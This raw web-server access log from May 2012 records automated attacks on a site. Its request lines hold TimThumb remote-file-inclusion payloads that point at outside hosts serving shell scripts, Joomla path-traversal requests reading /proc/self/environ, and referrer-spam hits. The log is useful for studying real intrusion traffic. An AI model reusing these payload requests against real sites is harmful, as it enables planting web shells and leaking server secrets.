78.137.37.171 - - [14/May/2012:07:50:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1596331 "http://androidusplay.info/sitemap70.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:07:50:51 +0200] "GET /logs/access_log HTTP/1.0" 200 1596543 "http://androidusplay.info/sitemap70.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
78.137.37.171 - - [14/May/2012:07:50:52 +0200] "GET /logs/access_log HTTP/1.0" 200 1596749 "http://androidusplay.info/sitemap70.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01"
78.137.37.171 - - [14/May/2012:07:50:52 +0200] "GET /logs/access_log HTTP/1.0" 200 1596932 "http://androidusplay.info/sitemap70.html" "Mozilla/4.79 [en] (Windows NT 5.0; U)"
204.232.204.219 - - [14/May/2012:07:51:04 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.232.204.219 - - [14/May/2012:07:51:05 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
195.24.65.50 - - [14/May/2012:07:51:18 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
195.24.65.50 - - [14/May/2012:07:51:18 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
204.232.204.219 - - [14/May/2012:07:51:30 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:51:31 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:52:15 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:52:16 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.232.204.219 - - [14/May/2012:07:52:17 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:52:17 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.232.204.219 - - [14/May/2012:07:52:18 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:52:18 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.232.204.219 - - [14/May/2012:07:52:19 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:52:19 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
90.198.87.118 - - [14/May/2012:07:52:58 +0200] "GET /stats//wp-content/themes/Polished/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:52:59 +0200] "GET /stats//wp-content/themes/Polished/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:53:01 +0200] "GET //wp-content/themes/Polished/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:53:02 +0200] "GET //wp-content/themes/Polished/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
64.69.33.150 - - [14/May/2012:07:53:44 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
64.69.33.150 - - [14/May/2012:07:53:44 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
88.212.1.242 - - [14/May/2012:07:54:38 +0200] "GET /stats/log.keys.html HTTP/1.1" 200 20272 "http://www.androidevi.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
216.70.71.78 - - [14/May/2012:07:54:42 +0200] "GET /stats//wp-content/themes/mystream/tools/timthumb.php?src= HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:54:42 +0200] "GET /stats//wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:54:42 +0200] "GET /stats//wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:54:42 +0200] "GET //wp-content/themes/mystream/tools/timthumb.php?src= HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:54:42 +0200] "GET //wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:54:42 +0200] "GET //wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:54:45 +0200] "GET /stats//wp-content/themes/mystream/tools/timthumb.php?src= HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:54:45 +0200] "GET /stats//wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:54:45 +0200] "GET /stats//wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:54:45 +0200] "GET //wp-content/themes/mystream/tools/timthumb.php?src= HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:54:46 +0200] "GET //wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:54:46 +0200] "GET //wp-content/themes/mystream/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
193.33.175.15 - - [14/May/2012:07:54:53 +0200] "GET /stats/?option=com_realtyna&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6337669 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
193.33.175.15 - - [14/May/2012:07:55:05 +0200] "GET /?option=com_realtyna&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 945 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.69.33.150 - - [14/May/2012:07:55:24 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
64.69.33.150 - - [14/May/2012:07:55:24 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
204.232.204.219 - - [14/May/2012:07:56:15 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:56:15 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.232.204.219 - - [14/May/2012:07:56:16 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:56:16 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.232.204.219 - - [14/May/2012:07:56:17 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:56:18 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.232.204.219 - - [14/May/2012:07:56:18 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:07:56:19 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
78.137.37.171 - - [14/May/2012:07:56:36 +0200] "GET /logs/access_log HTTP/1.0" 200 1608224 "http://androidusplay.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
78.137.37.171 - - [14/May/2012:07:56:37 +0200] "GET /logs/access_log HTTP/1.0" 200 1608426 "http://androidusplay.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
78.137.37.171 - - [14/May/2012:07:56:37 +0200] "GET /logs/access_log HTTP/1.0" 200 1608674 "http://androidusplay.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000"
78.137.37.171 - - [14/May/2012:07:56:38 +0200] "GET /logs/access_log HTTP/1.0" 200 1608917 "http://androidusplay.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
78.137.37.171 - - [14/May/2012:07:56:38 +0200] "GET /logs/access_log HTTP/1.0" 200 1609165 "http://androidusplay.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
184.173.6.208 - - [14/May/2012:07:57:27 +0200] "GET //wp-content/plugins/wp-pagenavi/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
95.132.213.162 - - [14/May/2012:08:00:23 +0200] "GET /logs/access_log HTTP/1.0" 200 1609683 "http://androidenplay.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:08:00:27 +0200] "GET /logs/access_log HTTP/1.0" 200 1609916 "http://androidenplay.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)"
95.132.213.162 - - [14/May/2012:08:00:33 +0200] "GET /logs/access_log HTTP/1.0" 200 1610114 "http://androidenplay.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
95.132.213.162 - - [14/May/2012:08:00:40 +0200] "GET /logs/access_log HTTP/1.0" 200 1610303 "http://androidenplay.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
95.132.213.162 - - [14/May/2012:08:00:36 +0200] "GET /logs/access_log HTTP/1.0" 200 1610303 "http://androidenplay.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
204.232.204.219 - - [14/May/2012:08:01:35 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:08:01:36 +0200] "GET /stats//wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:08:01:38 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/count.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
204.232.204.219 - - [14/May/2012:08:01:39 +0200] "GET //wp-content/themes/mystream/thumb.php?src=http://picasa.com.reginaalcalde.cl/contents/bob.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
176.195.245.159 - - [14/May/2012:08:01:43 +0200] "GET /stats/log.keys.html HTTP/1.0" 200 20272 "http://yandex.ru/yandsearch?text=%22/themes/karma/%22+page_id" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.111.246.233 - - [14/May/2012:08:02:01 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
86.111.246.233 - - [14/May/2012:08:02:01 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
86.111.246.233 - - [14/May/2012:08:02:01 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
78.137.37.171 - - [14/May/2012:08:02:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1612405 "http://androidusplay.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
78.137.37.171 - - [14/May/2012:08:02:30 +0200] "GET /logs/access_log HTTP/1.0" 200 1612592 "http://androidusplay.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:08:02:31 +0200] "GET /logs/access_log HTTP/1.0" 200 1612798 "http://androidusplay.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))"
78.137.37.171 - - [14/May/2012:08:02:32 +0200] "GET /logs/access_log HTTP/1.0" 200 1613008 "http://androidusplay.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
78.137.37.171 - - [14/May/2012:08:02:32 +0200] "GET /logs/access_log HTTP/1.0" 200 1613220 "http://androidusplay.info/sitemap84.html" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)"
64.69.33.150 - - [14/May/2012:08:02:34 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
64.69.33.150 - - [14/May/2012:08:02:34 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
64.69.33.150 - - [14/May/2012:08:02:34 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
216.70.71.78 - - [14/May/2012:08:04:16 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:04:16 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:04:16 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:04:16 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:04:16 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:04:16 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:04:25 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:04:25 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:04:25 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:04:26 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:04:26 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:04:26 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
193.33.175.15 - - [14/May/2012:08:05:22 +0200] "GET /stats//index.php?option=com_realtyna&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
193.33.175.15 - - [14/May/2012:08:05:23 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
193.33.175.15 - - [14/May/2012:08:05:45 +0200] "GET /stats//index.php?option=com_realtyna&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
193.33.175.15 - - [14/May/2012:08:05:46 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
184.173.6.208 - - [14/May/2012:08:05:58 +0200] "GET /stats/log.keys.html//wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:05:59 +0200] "GET //wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:06:00 +0200] "GET /stats//wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:06:00 +0200] "GET /stats/log.keys.html//wp-content/plugins/wp-pagenavi/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:06:01 +0200] "GET //wp-content/plugins/wp-pagenavi/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:06:02 +0200] "GET /stats//wp-content/plugins/wp-pagenavi/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.70.71.78 - - [14/May/2012:08:06:21 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:06:21 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:06:21 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:06:21 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:08:06:21 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
